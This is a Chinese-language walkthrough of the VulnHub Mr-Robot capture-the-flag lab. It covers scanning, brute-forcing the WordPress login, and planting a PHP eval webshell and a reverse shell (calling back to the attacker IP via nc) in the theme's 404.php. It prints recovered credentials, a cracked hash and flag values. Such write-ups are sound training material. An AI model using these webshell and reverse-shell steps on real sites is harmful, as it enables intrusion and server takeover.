从vulnhub下载并且用vmware打开Mr-Robot后，先看看是否已经给出ip地址，如果没有，就用我的kali攻击机执行买了arp-scan -l 扫描，看能否扫描出相应的ip。如果不能，就需要通过所谓拯救模式进行操作。

攻击机kali与靶机均在vmware下的NAT网段10.1.1.0/24。

kali的ip为

10.1.1.128

arp-scan -l

 

 可以扫描出靶机ip 为：

10.1.1.135

扫描端口信息

nmap -A -p- 10.1.1.135

 

 开放了80端口和443端口对应的http和https服务，我们可以进入网站试试如何展开渗透测试

 

 这是一个linux网站，提供了prepare,fsociety,inform,question,wakeup,join等命令。

输入prepare命令发现是一个视频。

输入fsociety命令发现依然是一个视频。

输入inform命令发现是一些图片和文字。

输入question命令发现是一些图片。

输入wakeup命令发现是视频。

输入join命令，弹出提示输入邮箱地址。  

我们要扫描该网页，可以应用著名的扫描神器nikto,它可以对网页进行全面的多种扫描，包含超过3300种有潜在危险的文件/CGIs；超过625种服务器版本；超过230种特定服务器问题。扫描项和插件可以自动更新（如果需要）。基于Whisker/libwhisker完成其底层功能。这是一款非常棒的工具.

nikto -h 10.1.1.135

我们可以试试wp-login界面

再用dirb扫描。只要字典足够大，用时长一些，该扫描的效果还是不错的，可以扫描出网站几乎所有的网页。

dirb http://10.1.1.135

经过一段时间的扫描（有时可能时间长，渗透测试有充分的耐心是其基本修养），发现有很多目录，其中值得注意的目录有/readme、/admin,/robots.txt、/wp-admin,/wp-login等。

下面对这些目录进行访问，看有没有有用的内容。

访问readme目录

 

 访问robots.txt

 

似乎key-1-of-3.txt可能有用，访问得

轻易就得到第一个flag！

073403c8a58a1f80d943455fb30724b9

访问fsocity.dic

看到很多的字典文件。

在kali下载该字典

wget  http://10.1.1.135/fsocity.dic

 

 socity较大，7.0M，猜测可能有重复的

 

 用命令:cat fsocity.dic | sort -u > dic.txt，去重后写入新的文件，发现去重后的字典dic.txt只有95kb大小了

 

 wp-login目录是WordPress登录界面

应该可以利用字典文件，进行爆破登录的。

我们用burpsuite的intruder爆破，字典就用dic.txt。（也可用wpscan，gobuster，hydra工具进行扫描、爆破）

先爆破用户名

 

 

 

 用户名可能为elliot、Elliot、ELLIOT，也即不区分大小写的elliot：

 

 对密码字段进行爆破，发现密码可能为ER28-0652

 

 

 

 成功登录后台

 

 WordPress往往可以利用其404文件，是wp-admin下文件，通过编辑写入恶意代码，再直接用蚁剑之类直接连接，拿下GetShell，并且一般都在一个叫Editor的栏目下

点击404文件，修改Twenty Fifteen: 404 Template (404.php)为一句话木马

<?php eval($_REQUEST['hhh']);?>

 

 404.php在http://10.1.1.135/wp-content/themes/twentyfifteen/404.php

 

 

成功进入了靶机！

然后去根目录的home目录下，

 

 发现有个可疑的robot目录，下面还有个密码文件，和第二个flag的txt文件，直接用蚁剑访问flag文件读不出东西，显然有权限限制，

 

 再看password.raw-md5密码文件

 

 可见md5密码值c3fcd3d76192e4007dfb496cca67e13b

到相关md5破译网站，可以获得robot的密码：

abcdefghijklmnopqrstuvwxyz

如果可以进行ssh连接，也就等于直接登录靶机

用robot账号登录靶机

 

 

得到第二个flag

822c73956184f694993bede3eb39f959

如果不直接进行ssh靶机登录，就要进行相应的提权操作

使用命令查找关于php-reverse的shell

find / -name php-reverse-shell.php

使用

/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

按照文件操作要求，设置ip地址为kali攻击机ip:10.1.1.128，保持端口为默认8888不变，

 

 将修改后的php反弹代码粘贴在WordPress中editor页面的404.php文件。

 

 在Kali上使用nc监听相应的8888端口

在浏览器中访问修改过的404.php，

http://10.1.1.135/wp-content/themes/twentyfifteen/404.php

 

 

得到反弹shell。

查看10.1.1.135中的用户

值得注意的是家目录/home下的用户robot

 

 文件都在robot下

进入robot看看

直接查看key-2-of-3.txt即第二个flag的权限不够，但可以进入用户robot，已经给出了对应的密码md5值，到相关md5破译网站，可以获得robot的密码：abcdefghijklmnopqrstuvwxyz

但不能直接进入：

 

 要在终端下运行。我们打开交互式终端

python -c 'import pty;pty.spawn("/bin/bash")'

就得到第二个flag

822c73956184f694993bede3eb39f959